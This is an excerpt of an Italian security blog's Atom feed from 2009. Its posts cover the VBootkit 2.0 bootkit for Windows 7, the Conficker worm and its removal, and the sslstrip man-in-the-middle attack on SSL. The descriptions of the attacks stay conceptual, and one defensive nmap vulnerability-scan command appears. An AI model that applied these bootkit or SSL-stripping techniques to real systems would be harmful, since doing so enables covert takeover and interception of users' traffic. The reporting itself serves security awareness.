href="http://www.facebook.com/groups.php?ref=sb#/pages/Symantec-Technology-Day/74719484173"&gt;http://www.facebook.com/groups.php?ref=sb#/pages/Symantec-Technology-Day/74719484173 &lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;hr /&gt;
&lt;a href="http://www.hackerscenter.com"&gt;Hackers Center&lt;/a&gt; &lt;font color="green"&gt; - 1300 testi, 800 tools + blogs, exploits and researches&lt;/font&gt;&lt;br /&gt;
&lt;a href="http://www.securitybrigade.com"&gt;Security Brigade&lt;/a&gt; &lt;font color="green"&gt; - Security services&lt;/font&gt;
&lt;hr /&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3119071581036116485-2611038802906377507?l=www.armandoromeo.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/mE0CIoA9-hyRTcgdBfoGnkmNG4w/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/mE0CIoA9-hyRTcgdBfoGnkmNG4w/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/mE0CIoA9-hyRTcgdBfoGnkmNG4w/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/mE0CIoA9-hyRTcgdBfoGnkmNG4w/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=26-wwN3UNQw:Aurxmrslo_I:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=26-wwN3UNQw:Aurxmrslo_I:63t7Ie-LG7Y"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?d=63t7Ie-LG7Y" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=26-wwN3UNQw:Aurxmrslo_I:4cEx4HpKnUU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?i=26-wwN3UNQw:Aurxmrslo_I:4cEx4HpKnUU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=26-wwN3UNQw:Aurxmrslo_I:7Q72WNTAKBA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?d=7Q72WNTAKBA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=26-wwN3UNQw:Aurxmrslo_I:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=26-wwN3UNQw:Aurxmrslo_I:gIN9vFwOqvQ"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?i=26-wwN3UNQw:Aurxmrslo_I:gIN9vFwOqvQ" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/SicurezzaInformatica/~4/26-wwN3UNQw" height="1" width="1"/&gt;</content><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3119071581036116485/posts/default/2611038802906377507?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3119071581036116485/posts/default/2611038802906377507?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/SicurezzaInformatica/~3/26-wwN3UNQw/symantec-technology-day-scenario-2009.html" title="Symantec Technology Day Scenario 2009" /><author><name>Armando Romeo</name><uri>http://www.blogger.com/profile/17178561136430555875</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="31" height="32" src="http://4.bp.blogspot.com/_-FDKJTRMHR0/S9LqZyx8DRI/AAAAAAAAAEI/yiTq9_XrKEs/S220/3.jpg" /></author><feedburner:origLink>http://www.armandoromeo.com/2009/05/symantec-technology-day-scenario-2009.html</feedburner:origLink></entry><entry gd:etag="W/&quot;DkANQXc8eip7ImA9WxJSF04.&quot;"><id>tag:blogger.com,1999:blog-3119071581036116485.post-7500946581473927391</id><published>2009-05-07T15:04:00.000-07:00</published><updated>2009-05-07T15:19:50.972-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2009-05-07T15:19:50.972-07:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="rootkit" /><category scheme="http://www.blogger.com/atom/ns#" term="vbootkit" /><category scheme="http://www.blogger.com/atom/ns#" term="windows" /><title>VBootkit 2.0  per Windows 7 rilasciato</title><content type="html">Vipin &amp;amp; Nitin Kumar hanno rilasciato il Vbootkit 2.0 che tanto ha fatto parlare di loro in passato.&lt;br /&gt;&lt;br /&gt;I ragazzi indiani, coi quali tutt'ora lavoro, sono diventati famosi dopo il Vista Bootkit 1.0 presentato al Black Hat USA 3 anni fa. La presentazione solo-audio, per non farsi riconoscere in viso, ne aumentò la  fama e ne alimentò la leggenda che almeno per una volta posso testimoniare essere  giustificata.&lt;br /&gt;&lt;br /&gt;I due, età 24 anni, sono riusciti a bypassare questa volta tutte le procedura di sicurezza di Windows 7, ancora una volta, caricando un programma al boot del computer. (da qui il nome)&lt;br /&gt;Tale programma è in grado di fare un hook della INT 13, e di patchare innanzi tutto bootmgr.exe e poi via via tutti gli altri programmi eseguiti al boot ancor prima che le funzioni di sicurezza di windows vengano attivate. E' così possibile assumere il pieno controllo della macchina senza lasciare alcuna traccia su disco. Una volta lanciato il bootkit, le possibilità sono infinite (alcune, come keylogging e bypass del DRM sono state dimostrate dal vivo).&lt;br /&gt;&lt;br /&gt;Da notare che perché tutto ciò avvenga è necessario avere accesso fisico alla macchina oppure privilegi di Amministratore.&lt;br /&gt;&lt;br /&gt;Le metodologie utilizzate dai due sono davvero molto sofisticate. A chi avesse conoscenze di Kernel windows, e programmazione assembler, consiglio di leggere direttamente le &lt;a href="http://conference.hitb.org/hitbsecconf2009dubai/materials/D2T2%20-%20Vipin%20and%20Nitin%20Kumar%20-%20vbootkit%202.0.pdf"&gt;slide &lt;/a&gt;della presentazione all'ultimo HITB Dubai dove i due hanno presentato il VBootkit 2.0.&lt;br /&gt;&lt;br /&gt;E' possibile scaricare il codice sorgente da &lt;a href="http://www.nvlabs.in"&gt;NvLabs&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;hr /&gt;
&lt;a href="http://www.hackerscenter.com"&gt;Hackers Center&lt;/a&gt; &lt;font color="green"&gt; - 1300 testi, 800 tools + blogs, exploits and researches&lt;/font&gt;&lt;br /&gt;
&lt;a href="http://www.securitybrigade.com"&gt;Security Brigade&lt;/a&gt; &lt;font color="green"&gt; - Security services&lt;/font&gt;
&lt;hr /&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3119071581036116485-7500946581473927391?l=www.armandoromeo.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/DQk3lGv1psfx8ynjqyuDAKSNUA4/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/DQk3lGv1psfx8ynjqyuDAKSNUA4/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/DQk3lGv1psfx8ynjqyuDAKSNUA4/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/DQk3lGv1psfx8ynjqyuDAKSNUA4/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=NiOK_H1hi-8:Wd0qb2gA7lY:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=NiOK_H1hi-8:Wd0qb2gA7lY:63t7Ie-LG7Y"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?d=63t7Ie-LG7Y" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=NiOK_H1hi-8:Wd0qb2gA7lY:4cEx4HpKnUU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?i=NiOK_H1hi-8:Wd0qb2gA7lY:4cEx4HpKnUU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=NiOK_H1hi-8:Wd0qb2gA7lY:7Q72WNTAKBA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?d=7Q72WNTAKBA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=NiOK_H1hi-8:Wd0qb2gA7lY:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=NiOK_H1hi-8:Wd0qb2gA7lY:gIN9vFwOqvQ"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?i=NiOK_H1hi-8:Wd0qb2gA7lY:gIN9vFwOqvQ" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/SicurezzaInformatica/~4/NiOK_H1hi-8" height="1" width="1"/&gt;</content><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3119071581036116485/posts/default/7500946581473927391?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3119071581036116485/posts/default/7500946581473927391?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/SicurezzaInformatica/~3/NiOK_H1hi-8/vbootkit-20-per-windows-7-rilasciato.html" title="VBootkit 2.0  per Windows 7 rilasciato" /><author><name>Armando Romeo</name><uri>http://www.blogger.com/profile/17178561136430555875</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="31" height="32" src="http://4.bp.blogspot.com/_-FDKJTRMHR0/S9LqZyx8DRI/AAAAAAAAAEI/yiTq9_XrKEs/S220/3.jpg" /></author><feedburner:origLink>http://www.armandoromeo.com/2009/05/vbootkit-20-per-windows-7-rilasciato.html</feedburner:origLink></entry><entry gd:etag="W/&quot;AkMEQXs6cCp7ImA9WxVbGEg.&quot;"><id>tag:blogger.com,1999:blog-3119071581036116485.post-737479429500914358</id><published>2009-04-04T06:58:00.000-07:00</published><updated>2009-04-04T08:20:00.518-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2009-04-04T08:20:00.518-07:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="malware" /><category scheme="http://www.blogger.com/atom/ns#" term="antivirus" /><category scheme="http://www.blogger.com/atom/ns#" term="conficker" /><title>Conficker  - Italia tra le più colpite</title><content type="html">Il &lt;span style="font-weight: bold;"&gt;conficker &lt;/span&gt;worm si è conquistato il suo spazio anche nei telegiornali. Tiene col fiato sospeso milioni di utenti di internet. E fa tirare un sospiro di sollievo alle aziende produttrici di Antivirus che almeno per qualche mese possono far fronte alla crisi economica con un discreto aumento nelle vendite .&lt;br /&gt;&lt;br /&gt;A parte la guerra di cifre a cui anche noi italiani siamo abituati da tempo ( "Siamo 1 milione" (in una piazza che ne può contenere 50,000)) , la diffusione da Settembre 2008 a oggi sembre essere su larga scala. Cifre di F-Secure contano in 1-2 milioni i PC infetti. Altri parlano di 9-10 milioni.&lt;br /&gt;&lt;br /&gt;I computer italiani e tedeschi sembrano essere tra i più colpiti in europa (in percentuale alla popolazione internet) :&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_-FDKJTRMHR0/SdduwZymYhI/AAAAAAAAAC0/xJm3evNFfeQ/s1600-h/conficker_europe_map.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 306px;" src="http://1.bp.blogspot.com/_-FDKJTRMHR0/SdduwZymYhI/AAAAAAAAAC0/xJm3evNFfeQ/s320/conficker_europe_map.jpg" alt="" id="BLOGGER_PHOTO_ID_5320843262597423634" border="0" /&gt;&lt;/a&gt;&lt;/div&gt;Non che questi numeri siano attendibili, ma questo dovrebbe far riflettere sulle abitudini nostrane. (Siamo comunque in ottima compagnia. Gli amici della &lt;a href="http://www.confickerworkinggroup.org/wiki/uploads/ANY/conficker_us_map.png"&gt;east coast americana &lt;/a&gt;non sono messi molto meglio)&lt;br /&gt;&lt;br /&gt;La vulnerabilità ms08-67 su cui si basa Conficker è nota da Settembre e &lt;a href="http://www.microsoft.com/technet/security/Bulletin/MS08-067.mspx"&gt;patchata&lt;/a&gt; in Ottobre.&lt;br /&gt;&lt;br /&gt;Il worm da allora ha avuto un evoluzione, da semplice worm, con qualche errore di progettazione, a complesso software distribuito con tanto di utilizzo di ultime tecnologie del settore (una fra tutte l'algoritmo di hashing MD6 pubblicato in Ottobre dai ricercatori del MIT capeggiati da Rivest).&lt;br /&gt;&lt;br /&gt;Dopo la fatidica data del 1 Aprile, che i media ci avevano detto essere l'apocalisse di Internet, il worm è approdato alla versione C scaricando nuovi aggiornamenti e istruzioni da 500 domini scelti casualmente su 50,000 a disposizione dei creatori. (Un algoritmo viene utilizzato e per ogni nome di dominio generato dall'algoritmo viene inviata una richiesta in polling per ricevere nuovo codice da eseguire. Se la risposta è codice binario, viene caricato ed eseguito sulla macchina infetta, altrimenti si procede con il prossimo nome di dominio nell'algoritmo).&lt;br /&gt;&lt;br /&gt;Con la versione C, Conficker è anche in grado di fare a meno di punti di rendez-vous fissi (server a cui collegarsi per ricevere informazioni/codice). Un complesso sistema di peer to peer è stato inserito nel codice. E' chiaro che più tempo passa, più i creatori avranno modo di raffinare il loro prodotto e renderlo sempre più difficile da fermare.&lt;br /&gt;&lt;br /&gt;Fino ad ora tuttavia, a parte le notizie sulla diffusione, Conficker non sembra essere un virus molto cattivo (quasi un carmelitano scalzo in confronto al Blaster del 2003). A parte la variante A, quella dell'autunno 2008, che furtivamente collezionava login, carte di credito e documenti per poi inviarli a vari server, non si notano particolari azioni malevole.&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_-FDKJTRMHR0/Sdd5BVJwsRI/AAAAAAAAAC8/G3gLV2kPCsA/s1600-h/conficker.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 282px; height: 400px;" src="http://3.bp.blogspot.com/_-FDKJTRMHR0/Sdd5BVJwsRI/AAAAAAAAAC8/G3gLV2kPCsA/s400/conficker.jpg" alt="" id="BLOGGER_PHOTO_ID_5320854548526444818" border="0" /&gt;&lt;/a&gt;E' proprio per questo che i ricercatori aspettano le prossime mosse dei creatori del worm.&lt;br /&gt;Il pericolo che l'infezione si trasformi in Botnet è reale.&lt;br /&gt;Se pensiamo che aziende che fanno dello spam il loro business hanno pagato e pagano decine e anche centinaia di miglia di dollari per l'utilizzo di botnet di 50-100,000 membri,&lt;br /&gt;il valore monetario di Conficker sarebbe davvero alto.&lt;br /&gt;&lt;br /&gt;Per concludere consiglio 4 semplici passi:&lt;br /&gt;&lt;ol&gt;&lt;li&gt;Verificare se siete infetti semplicemente &lt;a href="http://www.confickerworkinggroup.org/infection_test/cfeyechart.html"&gt;navigando qui&lt;/a&gt;&lt;br /&gt;&lt;/li&gt;&lt;li&gt;Utilizzare &lt;a href="ftp://ftp.f-secure.com/anti-virus/tools/beta/f-downadup.zip"&gt;questo tool gratuito&lt;/a&gt; per rimuovere conficker&lt;/li&gt;&lt;li&gt;Fare una scansione della vostra rete con &lt;a href="http://nmap.org/download.html"&gt;nmap ultima versione&lt;/a&gt; per verificare la presenza di computer infetti&lt;br /&gt;&lt;span style="font-style: italic;"&gt;nmap -PN -T4 -p139,445 -n -v --script=smb-check-vulns --script-args safe=1 [targetnetworks]&lt;/span&gt;&lt;/li&gt;&lt;li&gt;Non farsi prendere dal panico. Siamo lontani dai tempi di Morris. Gli hacker sono ormai in cerca di denaro, non di pagine sui libri di storia.&lt;br /&gt;&lt;br /&gt;&lt;/li&gt;&lt;/ol&gt;Per chi volesse approfondire sul funzionamento del Conficker è disponibile un ottimo writeup aggiornato frequentemente &lt;a href="http://mtc.sri.com/Conficker/addendumC/index.html"&gt;qui&lt;/a&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;hr /&gt;
&lt;a href="http://www.hackerscenter.com"&gt;Hackers Center&lt;/a&gt; &lt;font color="green"&gt; - 1300 testi, 800 tools + blogs, exploits and researches&lt;/font&gt;&lt;br /&gt;
&lt;a href="http://www.securitybrigade.com"&gt;Security Brigade&lt;/a&gt; &lt;font color="green"&gt; - Security services&lt;/font&gt;
&lt;hr /&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3119071581036116485-737479429500914358?l=www.armandoromeo.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/JnGDME3_7PBoaYKBXDRb1nRmCMo/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/JnGDME3_7PBoaYKBXDRb1nRmCMo/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/JnGDME3_7PBoaYKBXDRb1nRmCMo/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/JnGDME3_7PBoaYKBXDRb1nRmCMo/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=mJQGQj6yzZA:RzJudSlK9eY:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=mJQGQj6yzZA:RzJudSlK9eY:63t7Ie-LG7Y"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?d=63t7Ie-LG7Y" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=mJQGQj6yzZA:RzJudSlK9eY:4cEx4HpKnUU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?i=mJQGQj6yzZA:RzJudSlK9eY:4cEx4HpKnUU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=mJQGQj6yzZA:RzJudSlK9eY:7Q72WNTAKBA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?d=7Q72WNTAKBA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=mJQGQj6yzZA:RzJudSlK9eY:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=mJQGQj6yzZA:RzJudSlK9eY:gIN9vFwOqvQ"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?i=mJQGQj6yzZA:RzJudSlK9eY:gIN9vFwOqvQ" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/SicurezzaInformatica/~4/mJQGQj6yzZA" height="1" width="1"/&gt;</content><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3119071581036116485/posts/default/737479429500914358?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3119071581036116485/posts/default/737479429500914358?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/SicurezzaInformatica/~3/mJQGQj6yzZA/conficker-rimozione-antivirus.html" title="Conficker  - Italia tra le più colpite" /><author><name>Armando Romeo</name><uri>http://www.blogger.com/profile/17178561136430555875</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="31" height="32" src="http://4.bp.blogspot.com/_-FDKJTRMHR0/S9LqZyx8DRI/AAAAAAAAAEI/yiTq9_XrKEs/S220/3.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/_-FDKJTRMHR0/SdduwZymYhI/AAAAAAAAAC0/xJm3evNFfeQ/s72-c/conficker_europe_map.jpg" height="72" width="72" /><feedburner:origLink>http://www.armandoromeo.com/2009/04/conficker-rimozione-antivirus.html</feedburner:origLink></entry><entry gd:etag="W/&quot;CkUEQ38_fyp7ImA9WxVUFEo.&quot;"><id>tag:blogger.com,1999:blog-3119071581036116485.post-5359302469430741895</id><published>2009-03-19T06:53:00.000-07:00</published><updated>2009-03-19T06:43:22.147-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2009-03-19T06:43:22.147-07:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="sniffing" /><category scheme="http://www.blogger.com/atom/ns#" term="ssl" /><category scheme="http://www.blogger.com/atom/ns#" term="sslstrip" /><category scheme="http://www.blogger.com/atom/ns#" term="sslsniff" /><title>sslstrip - Nuovi attacchi ad SSL</title><content type="html">Innanzi tutto ringrazio Brett Arion per la cortesia di avermi segnalato questa nuova e interessante ricerca presentata da Moxie Marlinspike all'ultimo Blackat DC.&lt;br /&gt;&lt;br /&gt;Moxie è il creatore del primo tool per lo &lt;span style="font-weight: bold;"&gt;sniffing su ssl, sslsniff&lt;/span&gt;, incluso in Backtrack e da tempo il tool  de facto per questo tipo di attacco man in the middle.&lt;br /&gt;&lt;br /&gt;Questo tool era in grado, appunto, di iniziare un attacco man in the middle tramite arpsoof (un tool di arp cache poisoning) e di fornire al client vittima un certificato valido sfruttando una vecchia  &lt;a href="http://www.thoughtcrime.org/ie-ssl-chain.txt"&gt;vulnerabilità&lt;/a&gt; in internet explorer. Tale vulnerabilità era resa possibile dal fatto che molti browser dell'epoca non validavano il campo BasicConstraints del X509 in cui era settato il bit  CA=FALSE rendendo perciò possibile la firma di un altro certificato con un certificato foglia.&lt;br /&gt;(La foglia non era più tale ma diveniva essa stessa CA).&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_-FDKJTRMHR0/ScJJvcxMCXI/AAAAAAAAACc/arijmC_WR9o/s1600-h/sslsniff.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 117px;" src="http://2.bp.blogspot.com/_-FDKJTRMHR0/ScJJvcxMCXI/AAAAAAAAACc/arijmC_WR9o/s400/sslsniff.jpg" alt="" id="BLOGGER_PHOTO_ID_5314891589775788402" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;L'attaccante, generato on-the-fly un nuovo certificato valido per il server , avrebbe poi decifrato dal client e cifrato verso il server (e viceversa), loggando tutto il traffico SSL decifrato.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.thoughtcrime.org/software/sslstrip/"&gt;sslstrip&lt;/a&gt; invece, ha su un approccio completamente diverso.&lt;br /&gt;La ricerca di Moxie si basa su alcune osservazioni:&lt;br /&gt;Le connessioni passano da http a https attraverso&lt;br /&gt;&lt;ol&gt;&lt;li&gt;Redirect (302)&lt;/li&gt;&lt;li&gt;Link&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_-FDKJTRMHR0/ScJJ5TtREeI/AAAAAAAAACk/kuO6UtMTerA/s1600-h/sslstrip.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 124px;" src="http://3.bp.blogspot.com/_-FDKJTRMHR0/ScJJ5TtREeI/AAAAAAAAACk/kuO6UtMTerA/s400/sslstrip.jpg" alt="" id="BLOGGER_PHOTO_ID_5314891759142113762" border="0" /&gt;&lt;/a&gt;&lt;/li&gt;&lt;/ol&gt;&lt;br /&gt;L'uomo nel mezzo è quindi in grado di intercettare tali richieste. Inizializzare una richiesta https al server web, ma forzare il client a continuare la sua sessione in http. In definitiva l'html fornito al client è del tutto simile alla sua versione cifrata, in modo tale da non insospettirlo.Questo viene ottenuto servendo le richieste del client con http piuttosto che https.&lt;br /&gt;&lt;br /&gt;I risultati mostrati da Moxie si riferiscono all'utilizzo di sslstrip su Tor network per 24 ore:&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_-FDKJTRMHR0/ScJJknK_F1I/AAAAAAAAACU/Oy6dqCQvz7w/s1600-h/Image6.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 364px; height: 155px;" src="http://2.bp.blogspot.com/_-FDKJTRMHR0/ScJJknK_F1I/AAAAAAAAACU/Oy6dqCQvz7w/s400/Image6.jpg" alt="" id="BLOGGER_PHOTO_ID_5314891403589785426" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Le slide della conferenza sono disponibili &lt;a href="https://www.blackhat.com/presentations/bh-dc-09/Marlinspike/BlackHat-DC-09-Marlinspike-Defeating-SSL.pdf"&gt;qui&lt;/a&gt;. Mentre &lt;a href="http://www.thoughtcrime.org/software/sslstrip/"&gt;qui&lt;/a&gt; è presente il video.&lt;div class="blogger-post-footer"&gt;&lt;hr /&gt;
&lt;a href="http://www.hackerscenter.com"&gt;Hackers Center&lt;/a&gt; &lt;font color="green"&gt; - 1300 testi, 800 tools + blogs, exploits and researches&lt;/font&gt;&lt;br /&gt;
&lt;a href="http://www.securitybrigade.com"&gt;Security Brigade&lt;/a&gt; &lt;font color="green"&gt; - Security services&lt;/font&gt;
&lt;hr /&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3119071581036116485-5359302469430741895?l=www.armandoromeo.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/YUD4OSx45r7RwDOmSNYuPfUPzHE/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/YUD4OSx45r7RwDOmSNYuPfUPzHE/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/YUD4OSx45r7RwDOmSNYuPfUPzHE/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/YUD4OSx45r7RwDOmSNYuPfUPzHE/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=AL8gun8fJbY:CqD2SV-vLGE:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=AL8gun8fJbY:CqD2SV-vLGE:63t7Ie-LG7Y"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?d=63t7Ie-LG7Y" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=AL8gun8fJbY:CqD2SV-vLGE:4cEx4HpKnUU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?i=AL8gun8fJbY:CqD2SV-vLGE:4cEx4HpKnUU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=AL8gun8fJbY:CqD2SV-vLGE:7Q72WNTAKBA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?d=7Q72WNTAKBA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=AL8gun8fJbY:CqD2SV-vLGE:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SicurezzaInformatica?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SicurezzaInformatica?a=AL8gun8fJbY:CqD2SV-vLGE:gIN9vFwOqvQ"&gt;&lt;img 